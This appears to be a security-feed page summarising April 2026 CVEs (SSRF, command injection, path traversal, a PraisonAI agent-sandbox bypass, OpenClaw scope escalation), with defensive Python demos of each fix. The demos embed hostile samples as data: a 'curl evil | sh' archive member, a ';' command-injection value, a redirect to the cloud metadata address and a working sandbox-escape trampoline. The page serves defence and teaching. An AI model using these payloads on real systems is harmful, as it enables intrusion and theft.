2026-04-10
2026-04-10 20:16Z
HIGH

CVE-2026-40168 — Gitroom Postiz: Prior to 2.21.5, the /api/public/stream endpoint is vulnerable to SSRF.

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-40168

Postiz is an AI social media scheduling tool. Prior to 2.21.5, the /api/public/stream endpoint is vulnerable to SSRF. Although the application validates the initially supplied URL and blocks direct private/internal hosts, it does not re-validate the final destination after HTTP redirects. As a result, an attacker can supply a public HTTPS URL that passes validation and then redirects the server-side request to an internal resource. CVSSv3.1 8.2 (HIGH)

CWE-918 · VND: Gitroom · VND: Postiz · TYP: Vulnerability
CVSS v3.1: 8.2
Score: 91
2026-04-10
2026-04-10 20:16Z
CRIT

CVE-2026-30232 — Depomo Chartbrew: Prior to 4.8.5, Chartbrew allows authenticated users to create API data connections with arbitrary

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-30232

Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.8.5, Chartbrew allows authenticated users to create API data connections with arbitrary URLs. The server fetches these URLs using request-promise without any IP address validation, enabling Server-Side Request Forgery attacks against internal networks and cloud metadata endpoints. This vulnerability is fixed in 4.8.5. CVSSv3.1 9.6 (CRITICAL)

CWE-918 · VND: Depomo · VND: Chartbrew · TYP: Vulnerability
CVSS v3.1: 9.6
Score: 98
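The two SSRF entries above fail at different points of the same check: Chartbrew never looks at where a connection URL resolves, and Postiz checks the first URL but not the redirect target. The Python guard below is an added example written for this page, not Postiz or Chartbrew code (both are JavaScript/TypeScript projects). It resolves every hostname, rejects private, loopback, link-local (which is where the 169.254.169.254 metadata address lives) and IPv4-mapped ranges, and follows redirects itself so each hop is re-validated. The DNS table, host names, addresses and HTTP responses are constructed for the demonstration, and the `fetch` and `resolve` callables are injected so it runs offline.

```python
import ipaddress
from urllib.parse import urljoin, urlsplit

# Address ranges a server-side fetcher must never reach (example list; extend for your own network).
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16",            # link-local: cloud metadata (169.254.169.254) lives here
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
    "::1/128", "fc00::/7", "fe80::/10",
)]
REDIRECTS = {301, 302, 303, 307, 308}


def is_public_ip(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped          # ::ffff:10.0.0.5 is 10.0.0.5 in disguise
    return not any(addr in net for net in BLOCKED_NETS)


def validate_url(url: str, resolve) -> None:
    """Raise ValueError unless url is http(s) and every address it resolves to is public."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    try:
        ips = [str(ipaddress.ip_address(host))]   # literal address, nothing to resolve
    except ValueError:
        ips = resolve(host)                        # resolver is injected so the demo runs offline
    if not ips:
        raise ValueError(f"cannot resolve {host!r}")
    for ip in ips:
        if not is_public_ip(ip):
            raise ValueError(f"{host!r} resolves to non-public address {ip}")


def fetch_first_hop_only(url, fetch, resolve):
    """The flawed pattern from the Postiz entry: validate once, then let redirects go anywhere."""
    validate_url(url, resolve)
    status, headers, body = fetch(url)
    while status in REDIRECTS:
        url = urljoin(url, headers["location"])
        status, headers, body = fetch(url)         # the new destination is never checked
    return body


def fetch_safely(url, fetch, resolve, max_redirects=5):
    """Follow redirects by hand so every hop is validated. fetch(url) must not auto-follow."""
    hops = []
    for _ in range(max_redirects + 1):
        validate_url(url, resolve)
        hops.append(url)
        status, headers, body = fetch(url)
        if status not in REDIRECTS:
            return body, hops
        location = headers.get("location")
        if not location:
            raise ValueError("redirect without Location header")
        url = urljoin(url, location)
    raise ValueError("too many redirects")


# Constructed DNS answers and HTTP responses for the demonstration (not real hosts).
FAKE_DNS = {"example.com": ["93.184.216.34"], "redirector.test": ["203.0.113.10"],
            "internal.corp": ["10.0.0.5"]}
FAKE_SITES = {
    "https://example.com/feed": (200, {}, b"public feed"),
    "https://redirector.test/go": (302, {"location": "http://169.254.169.254/latest/meta-data/"}, b""),
    "http://169.254.169.254/latest/meta-data/": (200, {}, b"instance credentials"),
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


def fake_fetch(url):
    return FAKE_SITES[url]


def demo() -> dict:
    out = {"public": fetch_safely("https://example.com/feed", fake_fetch, fake_resolve)[0]}
    for name, url in (("direct_internal", "http://internal.corp/admin"),
                      ("redirect_to_metadata", "https://redirector.test/go")):
        try:
            fetch_safely(url, fake_fetch, fake_resolve)
            out[name] = "allowed"
        except ValueError as err:
            out[name] = f"blocked: {err}"
    return out


if __name__ == "__main__":
    print(fetch_first_hop_only("https://redirector.test/go", fake_fetch, fake_resolve))  # leaks metadata
    print(demo())
```

Validating and then connecting by name still leaves a DNS-rebinding window: a production fetcher should connect to the address it validated (and send the original Host header) rather than resolving a second time inside the HTTP client.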
2026-04-10
2026-04-10 19:16Z
CRIT

CVE-2026-33707 — Chamilo: Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email)

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-33707

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email) with no random component, no expiration, and no rate limiting. An attacker who knows a user's email can compute the reset token and change the victim's password without authentication. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. CVSSv3.1 9.4 (CRITICAL)

CWE-640 · VND: Chamilo · TYP: Vulnerability
CVSS v3.1: 9.4
Score: 97
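The Chamilo reset-token entry above lists three missing properties (randomness, expiry, rate limiting). The Python below is an added example for this page, not Chamilo code (which is PHP): `chamilo_style_token` reproduces the sha1-of-email scheme the entry describes, so the attacker's offline computation is the server's token, and `ResetTokenStore` is a hypothetical hardened counterpart that issues a CSPRNG token, stores only its hash, expires it, allows one use, caps wrong guesses and compares in constant time. The victim address and the clock values are constructed.

```python
import hashlib
import hmac
import secrets
import time


def chamilo_style_token(email: str) -> str:
    """The weak scheme the entry describes: sha1 of the address, no secret, no randomness.
    Anyone who knows the e-mail derives the same value, so it is not a capability."""
    return hashlib.sha1(email.encode()).hexdigest()


class ResetTokenStore:
    """Hypothetical hardened store, not Chamilo code: random token, stored only as a hash,
    short lifetime, single use, capped guesses, constant-time comparison."""

    def __init__(self, ttl_seconds: int = 900, max_failures: int = 5, clock=time.time):
        self.ttl = ttl_seconds
        self.max_failures = max_failures
        self.clock = clock                  # injectable so expiry is testable without sleeping
        self._pending = {}                  # email -> [token_hash, expires_at, failures]

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, email: str) -> str:
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        self._pending[email] = [self._digest(token), self.clock() + self.ttl, 0]
        return token                        # goes into the e-mail link; the clear value is never stored

    def redeem(self, email: str, token: str) -> bool:
        entry = self._pending.get(email)
        if entry is None:
            return False
        token_hash, expires_at, failures = entry
        if self.clock() > expires_at:
            del self._pending[email]
            return False
        if not hmac.compare_digest(self._digest(token), token_hash):
            entry[2] = failures + 1
            if entry[2] >= self.max_failures:   # per-token guess cap instead of unlimited tries
                del self._pending[email]
            return False
        del self._pending[email]            # single use
        return True


def demo() -> dict:
    now = [1_700_000_000]                   # constructed clock
    store = ResetTokenStore(ttl_seconds=900, clock=lambda: now[0])
    victim = "victim@example.org"           # constructed address
    attacker_guess = chamilo_style_token(victim)   # what the vulnerable server would have sent
    token = store.issue(victim)
    out = {
        "guess_rejected": store.redeem(victim, attacker_guess),
        "real_token_accepted": store.redeem(victim, token),
        "replay_rejected": store.redeem(victim, token),
    }
    token = store.issue(victim)
    now[0] += 901                           # past the 900 s lifetime
    out["expired_rejected"] = store.redeem(victim, token)
    return out


if __name__ == "__main__":
    print(demo())
```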
2026-04-10
2026-04-10 19:16Z
HIGH

CVE-2026-33618 — Chamilo: Prior to 2.0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-33618

Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from the database. An attacker with admin access (obtainable via Advisory 1) can inject arbitrary PHP code into the settings, which is then executed when any user (including unauthenticated) requests /platform-config/list. This vulnerability is fixed in 2.0.0-RC.3. CVSSv3.1 8.8 (HIGH)

CWE-95 · VND: Chamilo · TYP: Vulnerability
CVSS v3.1: 8.8
Score: 94
2026-04-10
2026-04-10 19:11Z
HIGH

Metasploit Wrap-Up 10/04/2026

Rapid7 Research · rapid7.com · CVE-2026-20127 · CVE-2026-22200 · in the wild

Metasploit Framework 6.4.126 adds four new modules including an authentication bypass for Cisco Catalyst SD-WAN controllers (CVE-2026-20127, recently exploited in the wild), an arbitrary file read in osTicket via PHP filter chains (CVE-2026-22200), and AD/CS web enrollment certificate issuance. The release also includes a 2x speedup to msfvenom startup time and enhancements to LDAP/ADCS reporting and Windows S4U persistence techniques.

SRF: Application · SRF: Os · TAC: TA0004 · TAC: TA0005 · SRF: Network Appliance · TAC: TA0006 · TAC: TA0007 · TAC: TA0003
Score: 72
2026-04-10
2026-04-10 18:16Z
HIGH

CVE-2026-5483 — This vulnerability in the `odh-dashboard` component of Red Hat OpenShift AI (RHOAI) allows for

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-5483

A flaw was found in the `odh-dashboard` component of Red Hat OpenShift AI (RHOAI): a Node.js endpoint discloses Kubernetes Service Account tokens, which could enable an attacker to gain unauthorized access to Kubernetes resources. CVSSv3.1 8.5 (HIGH)

CWE-201 · TYP: Vulnerability
CVSS v3.1: 8.5
Score: 93
2026-04-10
2026-04-10 18:16Z
HIGH

CVE-2026-40163 — Saltcorn: Prior to 1.4.5, 1.5.5, and 1.6.0-beta.4, the POST /sync/offline_changes endpoint allows an unauthenticated attacker

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-40163

Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.5, 1.5.5, and 1.6.0-beta.4, the POST /sync/offline_changes endpoint allows an unauthenticated attacker to create arbitrary directories and write a changes.json file with attacker-controlled JSON content anywhere on the server filesystem. The GET /sync/upload_finished endpoint allows an unauthenticated attacker to list arbitrary directory contents and read specific JSON files. This vulne CVSSv3.1 8.2 (HIGH)

CWE-22 · VND: Saltcorn · TYP: Vulnerability
CVSS v3.1: 8.2
Score: 91
2026-04-10
2026-04-10 18:16Z
CRIT

CVE-2026-32892 — Chamilo: Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an OS Command Injection vulnerability in

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-32892

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an OS Command Injection vulnerability in the file move function. The move() function in fileManage.lib.php passes user-controlled path values directly into exec() shell commands without using escapeshellarg(). When a user moves a document via document.php, the move_to POST parameter — which only passes through Security::remove_XSS() (an HTML-only filter) — is concatenated direct CVSSv3.1 9.1 (CRITICAL)

CWE-78 · VND: Chamilo · TYP: Vulnerability
CVSS v3.1: 9.1
Score: 96
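The command-injection entry above makes a point worth isolating: an HTML filter (Security::remove_XSS()) says nothing about shell metacharacters, so a `;` in move_to survives into exec(). The Python below is an added example for this page, not Chamilo code (which is PHP): `remove_xss_like` is an approximation of an HTML-only filter, `move_command_vulnerable` rebuilds the concatenation pattern the entry describes, and `move_command_safe` shows the fix (an argv list with no shell; `shlex.quote` plays the role of escapeshellarg() where a shell string cannot be avoided). The source path and the attacker's move_to value are constructed.

```python
import html
import shlex
import subprocess
import sys


def remove_xss_like(value: str) -> str:
    """Stand-in for an HTML-only filter such as Security::remove_XSS(): it escapes markup
    characters and nothing else. (Approximation for the example, not Chamilo's code.)"""
    return html.escape(value, quote=True)


def move_command_vulnerable(src: str, move_to: str) -> str:
    """The entry's pattern: HTML-filtered input concatenated into a shell command string."""
    return f"mv {src} {remove_xss_like(move_to)}"


def move_command_safe(src: str, move_to: str) -> list:
    """Hardened: an argv list run without a shell, so all of move_to is one argument."""
    return ["mv", "--", src, move_to]


def shell_sees_extra_command(command: str) -> bool:
    """True when a ';' sits outside quotes, i.e. a shell would start a second command."""
    return any(tok == ";" for tok in shlex.shlex(command, posix=True, punctuation_chars=True))


def pass_through_argv(value: str) -> str:
    """Run a child without a shell and return what it received as argv[1]: ';' arrives as data."""
    proc = subprocess.run([sys.executable, "-c", "import sys; print(sys.argv[1])", value],
                          capture_output=True, text=True, check=True)
    return proc.stdout.rstrip("\n")


def demo() -> dict:
    payload = "docs; touch /tmp/pwned"          # constructed attacker value for the move_to parameter
    src = "/var/www/upload/a.txt"                # constructed
    vulnerable = move_command_vulnerable(src, payload)
    return {
        "vulnerable_command": vulnerable,
        "html_filter_changed_payload": remove_xss_like(payload) != payload,   # False: blind to ';'
        "shell_would_run_touch": shell_sees_extra_command(vulnerable),         # True
        "quoted_is_one_word": shell_sees_extra_command(f"mv {src} {shlex.quote(payload)}"),  # False
        "argv_list": move_command_safe(src, payload),
        "child_received": pass_through_argv(payload),                           # the literal string
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```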
2026-04-10
2026-04-10 18:16Z
HIGH

CVE-2026-31939 — Chamilo: Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-31939

Chamilo LMS is a learning management system. Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file deletion. User input from $_REQUEST['test'] is concatenated directly into a filesystem path without canonicalization or traversal checks. This vulnerability is fixed in 1.11.38. CVSSv3.1 8.3 (HIGH)

CWE-22 · CWE-73 · VND: Chamilo · TYP: Vulnerability
CVSS v3.1: 8.3
Score: 92
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-40200 — Stack-based memory corruption can occur during qsort of very large arrays, due to incorrectly

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-40200

An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory corruption can occur during qsort of very large arrays, due to incorrectly implemented double-word primitives. The number of elements must exceed about seven million, i.e., the 32nd Leonardo number on 32-bit platforms (or the 64th Leonardo number on 64-bit platforms, which is not practical). CVSSv3.1 8.1 (HIGH)

CWE-670 · TYP: Vulnerability
CVSS v3.1: 8.1
Score: 91
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-40158 — PraisonAI: Prior to 4.5.128, PraisonAI's AST-based Python sandbox can be bypassed using type.__getattribute__ trampoline, allowing

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-40158

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI's AST-based Python sandbox can be bypassed using type.__getattribute__ trampoline, allowing arbitrary code execution when running untrusted agent code. The _execute_code_direct function in praisonaiagents/tools/python_tools.py uses AST filtering to block dangerous Python attributes like __subclasses__, __globals__, and __bases__. However, the filter only checks ast.Attribute nodes, allowing a bypass. The san CVSSv3.1 8.6 (HIGH)

CWE-94 · CWE-693 · VND: Praisonai · TYP: Vulnerability
CVSS v3.1: 8.6
Score: 93
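The sandbox entry above hinges on one detail: the filter walks ast.Attribute nodes, but in `type.__getattribute__(object, '__subclasses__')` the dangerous name is a string constant, so the deny-list never sees it. The Python below is an added example for this page, not PraisonAI's `_execute_code_direct`: `attribute_only_filter` is a deny-list in the shape the entry describes, `dunder_anywhere_filter` is a tighter hypothetical check, and `run_untrusted` runs a snippet under a chosen filter and builtins table. The three snippets and the blocked-attribute set are constructed; the last part of `demo` shows why even the tighter filter is not a security boundary on its own.

```python
import ast
import builtins

# Deny-list in the shape the entry describes: only ast.Attribute nodes are inspected.
BLOCKED_ATTRS = {"__subclasses__", "__globals__", "__bases__", "__mro__", "__class__"}


def attribute_only_filter(source: str) -> bool:
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Attribute) and node.attr in BLOCKED_ATTRS:
            return False
    return True


def dunder_anywhere_filter(source: str) -> bool:
    """Tighter hypothetical check: no underscore-prefixed attribute or name, no string constant
    containing '__', no imports."""
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            return False
        if isinstance(node, ast.Attribute) and node.attr.startswith("_"):
            return False
        if isinstance(node, ast.Name) and node.id.startswith("_"):
            return False
        if isinstance(node, ast.Constant) and isinstance(node.value, str) and "__" in node.value:
            return False                    # catches the trampoline's string argument
    return True


def run_untrusted(source: str, checker, allowed_builtins=None):
    """Run source if checker accepts it and return whatever it stored in `result`."""
    if not checker(source):
        raise PermissionError("rejected by AST filter")
    env = {"__builtins__": allowed_builtins if allowed_builtins is not None else builtins.__dict__}
    exec(compile(source, "<untrusted>", "exec"), env)
    return env.get("result")


# Constructed snippets. BYPASS is the trampoline the entry names: the attribute is looked up by
# string, so no ast.Attribute carries a blocked name.
BYPASS = "result = type.__getattribute__(object, '__subclasses__')()\n"
DIRECT = "result = object.__subclasses__()\n"
BENIGN = "result = sum(range(10))\n"
ASSEMBLED = "result = getattr(object, '_' * 2 + 'subclasses' + '_' * 2)()\n"


def demo() -> dict:
    out = {
        "direct_blocked_by_weak_filter": not attribute_only_filter(DIRECT),
        "bypass_passes_weak_filter": attribute_only_filter(BYPASS),
        "bypass_blocked_by_dunder_filter": not dunder_anywhere_filter(BYPASS),
        "bypass_reaches_object_subclasses": type in run_untrusted(BYPASS, attribute_only_filter),
        "benign_result": run_untrusted(BENIGN, dunder_anywhere_filter, {"sum": sum, "range": range}),
        # A filter is not a boundary: the string can be assembled at run time, so the
        # builtins handed to untrusted code must be cut down as well.
        "assembled_passes_dunder_filter": dunder_anywhere_filter(ASSEMBLED),
    }
    try:
        run_untrusted(ASSEMBLED, dunder_anywhere_filter, {"sum": sum, "range": range})
        out["assembled_with_restricted_builtins"] = "executed"
    except NameError:                       # getattr and object are simply not there
        out["assembled_with_restricted_builtins"] = "NameError"
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

The practical conclusion is the one the fixed version has to live with: in-process AST filtering can raise the bar, but untrusted agent code needs a process or container boundary, not a syntax check.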
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-40157 — Praison Praisonai: Prior to 4.5.128, cmd_unpack in the recipe CLI extracts .praison tar archives using raw

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-40157

PraisonAI is a multi-agent teams system. Prior to 4.5.128, cmd_unpack in the recipe CLI extracts .praison tar archives using raw tar.extract() without validating archive member paths. A .praison bundle containing ../../ entries will write files outside the intended output directory. An attacker who distributes a malicious bundle can overwrite arbitrary files on the victim's filesystem when they run praisonai recipe unpack. This vulnerability is fixed in 4.5.128. CVSSv3.1 8.8 (HIGH)

CWE-22 · VND: Praison · VND: Praisonai · TYP: Vulnerability
CVSS v3.1: 8.8
Score: 94
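Three entries on this page are the same bug with different inputs: Chamilo's `$_REQUEST['test']` and Saltcorn's `changes.json` write a user-supplied path, and PraisonAI's `cmd_unpack` hands `../../` archive members to `tar.extract()`. The Python below is an added example for this page and not code from any of those projects: `safe_join` canonicalises a base directory plus untrusted segment and refuses anything that resolves outside the base, and `safe_extract` applies the same check to every tar member before writing and rejects link entries. The archives, member names and paths are constructed in memory so it runs offline.

```python
import io
import os
import tarfile
import tempfile


def safe_join(base: str, untrusted: str) -> str:
    """Resolve untrusted relative to base and refuse anything that lands outside base.
    Covers '../', absolute paths and symlinked parents (realpath follows them)."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, untrusted))
    if os.path.commonpath([base_real, target]) != base_real:
        raise ValueError(f"path escapes base directory: {untrusted!r}")
    return target


def safe_extract(tar: tarfile.TarFile, dest: str) -> list:
    """Validate every member before writing anything; return the names extracted."""
    names = []
    for member in tar.getmembers():
        if not (member.isfile() or member.isdir()):
            raise ValueError(f"refusing non-regular member: {member.name!r}")  # links redirect later writes
        safe_join(dest, member.name)                 # raises on ../ and absolute names
        names.append(member.name)
    kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}  # stdlib check on 3.12+
    tar.extractall(dest, **kwargs)
    return names


def build_tar(entries: dict) -> io.BytesIO:
    """Constructed archive for the demo: entries maps member name -> bytes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in entries.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf


def demo() -> dict:
    out = {}
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "out")
        os.mkdir(dest)
        # The JSON-write cases (Saltcorn changes.json, Chamilo $_REQUEST['test']): same check.
        out["json_inside"] = safe_join(dest, "sync/changes.json").startswith(os.path.realpath(dest))
        try:
            safe_join(dest, "../../etc/cron.d/changes.json")
            out["json_traversal"] = "allowed"
        except ValueError:
            out["json_traversal"] = "rejected"
        # The bundle case (PraisonAI .praison archive): benign member, then a ../../ member.
        with tarfile.open(fileobj=build_tar({"recipe/agents.yaml": b"name: demo\n"})) as tar:
            out["benign_members"] = safe_extract(tar, dest)
        out["benign_written"] = os.path.isfile(os.path.join(dest, "recipe", "agents.yaml"))
        try:
            with tarfile.open(fileobj=build_tar({"../../.bashrc": b"curl evil | sh\n"})) as tar:
                safe_extract(tar, dest)
            out["malicious"] = "extracted"
        except ValueError:
            out["malicious"] = "rejected"
    return out


if __name__ == "__main__":
    print(demo())
```

On Python 3.12 and later, `tarfile.extractall(path, filter="data")` performs this member validation in the standard library (including the link cases this example simply refuses); the explicit loop above is what to write where the interpreter may be older.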
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-35669 — Openclaw Openclaw: before 2026.3.25 contains a privilege escalation vulnerability in gateway-authenticated plugin HTTP routes that

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35669

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in gateway-authenticated plugin HTTP routes that incorrectly mint operator.admin runtime scope regardless of caller-granted scopes. Attackers can exploit this scope boundary bypass to gain elevated privileges and perform unauthorized administrative actions. CVSSv3.1 8.8 (HIGH)

CWE-648 · VND: Openclaw · TYP: Vulnerability
CVSS v3.1: 8.8
Score: 94
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-35666 — Openclaw Openclaw: before 2026.3.22 contains an allowlist bypass vulnerability in system.run approvals that fails to

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35666

OpenClaw before 2026.3.22 contains an allowlist bypass vulnerability in system.run approvals that fails to unwrap /usr/bin/time wrappers. Attackers can bypass executable binding restrictions by using an unregistered time wrapper to reuse approval state for inner commands. CVSSv3.1 8.8 (HIGH)

CWE-706 · VND: Openclaw · TYP: Vulnerability
CVSS v3.1: 8.8
Score: 94
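The allowlist entry above describes an approval that is bound to an executable but keyed before wrapper programs are stripped, so an unregistered wrapper (`/usr/bin/time`) makes every inner command look the same. The Python below is an added example for this page, not OpenClaw code (which is TypeScript): `unwrap` peels a table of known wrappers and their value-taking options, and `approval_key` derives the executable an approval should bind to from the unwrapped command. The wrapper table, the fake PATH lookup and the commands are constructed; the "before fix" table simply omits `time`.

```python
import os
import shlex

# Wrapper programs and the options of each that consume a following argument. Simplified table
# assumed for the example: a real policy needs the full option grammar of every wrapper it admits.
WRAPPERS = {
    "time": {"-f", "--format", "-o", "--output"},
    "env": {"-u", "--unset"},
    "nice": {"-n", "--adjustment"},
    "nohup": set(),
}


def unwrap(argv, wrappers=WRAPPERS):
    """Peel leading wrapper programs and their options until the command they run is exposed."""
    argv = list(argv)
    while argv and os.path.basename(argv[0]) in wrappers:
        name = os.path.basename(argv[0])
        value_flags = wrappers[name]
        i = 1
        while i < len(argv) and argv[i].startswith("-"):
            i += 2 if argv[i] in value_flags else 1
        if name == "env":                            # env also takes NAME=VALUE before the command
            while i < len(argv) and "=" in argv[i]:
                i += 1
        argv = argv[i:]
    return argv


def approval_key(argv, wrappers, which):
    """The executable an approval is bound to. which(name) resolves a bare name via PATH."""
    inner = unwrap(argv, wrappers)
    if not inner:
        return None
    exe = inner[0] if os.sep in inner[0] else which(inner[0])
    return os.path.normpath(exe) if exe else None


# Before the fix the entry describes, time was not a registered wrapper.
REGISTERED_BEFORE_FIX = {k: v for k, v in WRAPPERS.items() if k != "time"}
FAKE_PATH = {"ls": "/usr/bin/ls", "rm": "/bin/rm", "time": "/usr/bin/time"}   # constructed


def fake_which(name):
    return FAKE_PATH.get(name)


def demo() -> dict:
    approved = shlex.split("/usr/bin/time ls -la")            # what the operator approved
    reused = shlex.split("/usr/bin/time rm -rf /important")   # what runs under the same approval
    nested = shlex.split("env -i nice -n 5 /usr/bin/time -f %e ls")
    return {
        "before_fix_key_approved": approval_key(approved, REGISTERED_BEFORE_FIX, fake_which),
        "before_fix_key_reused": approval_key(reused, REGISTERED_BEFORE_FIX, fake_which),
        "after_fix_key_approved": approval_key(approved, WRAPPERS, fake_which),
        "after_fix_key_reused": approval_key(reused, WRAPPERS, fake_which),
        "nested_key": approval_key(nested, WRAPPERS, fake_which),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The general lesson is that the approval must be keyed on what will actually execute; any wrapper the table does not know is a future version of the same bypass, so a strict policy denies commands whose first word is neither an approved executable nor a known wrapper.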
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-35663 — Openclaw Openclaw: before 2026.3.25 contains a privilege escalation vulnerability allowing non-admin operators to self-request broader

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35663

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability allowing non-admin operators to self-request broader scopes during backend reconnect. Attackers can bypass pairing requirements to reconnect as operator.admin, gaining unauthorized administrative privileges. CVSSv3.1 8.8 (HIGH)

CWE-648 · VND: Openclaw · TYP: Vulnerability
CVSS v3.1: 8.8
Score: 94
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-35660 — Openclaw Openclaw: before 2026.3.23 contains an insufficient access control vulnerability in the Gateway agent /reset

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35660

OpenClaw before 2026.3.23 contains an insufficient access control vulnerability in the Gateway agent /reset endpoint that allows callers with operator.write permission to reset admin sessions. Attackers with operator.write privileges can invoke /reset or /new messages with an explicit sessionKey to bypass operator.admin requirements and reset arbitrary sessions. CVSSv3.1 8.1 (HIGH)

CWE-862 · VND: Openclaw · TYP: Vulnerability
CVSS v3.1: 8.1
Score: 91
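CVE-2026-35669, CVE-2026-35663 and CVE-2026-35660 above are three ways of letting a caller's effective scope drift above what pairing granted: a route that mints operator.admin on its own, a reconnect that accepts whatever scopes are requested, and a /reset that honours an explicit sessionKey without checking whose session it is. The Python below is an added example for this page, not OpenClaw code (which is TypeScript); it models the three decisions side by side with a flawed and a fixed form. The `Caller` type, the `operator.read` scope and the session table are assumptions for the demonstration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Caller:
    operator_id: str
    granted: frozenset        # the scopes pairing actually issued to this caller


def route_scopes_flawed(caller: Caller) -> frozenset:
    """CVE-2026-35669 pattern: the plugin route mints operator.admin because the gateway
    authenticated the call, ignoring the caller's own grant."""
    return frozenset({"operator.admin"})


def route_scopes(caller: Caller) -> frozenset:
    """Runtime scope is the caller's granted set and never wider."""
    return caller.granted


def reconnect_flawed(caller: Caller, requested) -> frozenset:
    """CVE-2026-35663 pattern: whatever the reconnecting backend asks for, it gets."""
    return frozenset(requested)


def reconnect(caller: Caller, requested) -> frozenset:
    """Scopes on reconnect are capped by the prior grant; widening means pairing again."""
    requested = frozenset(requested)
    widening = requested - caller.granted
    if widening:
        raise PermissionError(f"re-pair required for {sorted(widening)}")
    return requested


def can_reset_session(caller: Caller, session_key: str, sessions: dict) -> bool:
    """CVE-2026-35660 pattern, fixed: an explicit sessionKey is honoured for the caller's own
    sessions with operator.write, and for any session only with operator.admin."""
    owner = sessions.get(session_key)
    if owner is None:
        return False
    if "operator.admin" in caller.granted:
        return True
    return "operator.write" in caller.granted and owner == caller.operator_id


def demo() -> dict:
    sessions = {"sess-alice": "alice", "sess-bob": "bob"}                     # constructed
    alice = Caller("alice", frozenset({"operator.read", "operator.write", "operator.admin"}))
    bob = Caller("bob", frozenset({"operator.read", "operator.write"}))     # no admin
    out = {
        "plugin_route_flawed_gives_admin": "operator.admin" in route_scopes_flawed(bob),
        "plugin_route_fixed_gives_admin": "operator.admin" in route_scopes(bob),
        "reconnect_flawed_widens": "operator.admin" in reconnect_flawed(bob, {"operator.admin"}),
        "reconnect_fixed_same_scopes": reconnect(bob, bob.granted) == bob.granted,
        "bob_resets_own": can_reset_session(bob, "sess-bob", sessions),
        "bob_resets_alice": can_reset_session(bob, "sess-alice", sessions),
        "alice_resets_bob": can_reset_session(alice, "sess-bob", sessions),
    }
    try:
        reconnect(bob, {"operator.read", "operator.admin"})
        out["reconnect_fixed_widens"] = True
    except PermissionError:
        out["reconnect_fixed_widens"] = False
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```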
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-35653 — Openclaw Openclaw: before 2026.3.24 contains an incorrect authorization vulnerability in the POST /reset-profile endpoint that

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35653

